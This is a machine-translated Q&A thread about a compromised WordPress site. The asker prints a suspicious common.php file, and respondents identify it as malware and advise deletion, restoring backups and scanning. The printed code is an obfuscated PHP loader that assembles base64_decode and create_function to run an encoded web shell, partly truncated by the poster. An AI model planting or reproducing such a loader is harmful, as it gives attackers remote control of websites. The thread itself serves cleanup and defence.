1. 首頁
  2. 問答
  3. corrupted/hacked common.php文件?

corrupted/hacked common.php文件?

2017-06-20 24 views
2

我遇到了我的一個WordPress站點的問題。 (不斷登錄了用戶,而不是讓人們登錄)corrupted/hacked common.php文件?

我的託管認爲路線是的common.php文件(/public_html/wp-content/common.php)

任何人都可以擺脫任何光線什麼這些文件實際上在做什麼?我可以刪除它,並將WordPress生成一個新的文件?

的common.php代碼:

<?php 

$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6"; 
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG

*我已經在這裏切出大量的代碼,因爲它是在字符的限制(ABOT 90000 !!)

J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg=="; 
    $array_name = ""; 
    foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){ 
     $array_name .= $alphabet[$t]; 
    } 
    $a = strrev("noi"."tcnuf"."_eta"."erc"); 
    $f = $a("", $array_name($string)); 
    $f();

在此先感謝

豐富

來源

2017-06-20 Richard Prowse

+0

是的,它看起來像你的網站已經被黑客入侵。可能有一個'eval'在解密後運行這個代碼的地方。您可能需要從早期的備份中恢復。 –

回答

2

刪除 文件。 它不是WordPress安裝或升級包的一部分。我會假設該文件是惡意的,並且您的主機帳戶/個人計算機/登錄憑據已被盜用或類似的東西。

這是在這種情況下提及的標準支持DOC:https://codex.wordpress.org/FAQ_My_site_was_hacked

然後,一旦你的網站是乾淨的:
http://codex.wordpress.org/Hardening_WordPress

來源

2017-06-20 12:14:10

+0

感謝您的快速響應,我現在將刪除文件,看看它是否清除我們一直有問題。 –

+0

您可以使用在線惡意軟件掃描程序。也許像'Wordfence'這樣的插件來檢查是否有更多的受感染文件。 –

+0

乾杯,我有iThemes Securtiy所以會現在運行另一個掃描 –

相關問題

 相關問題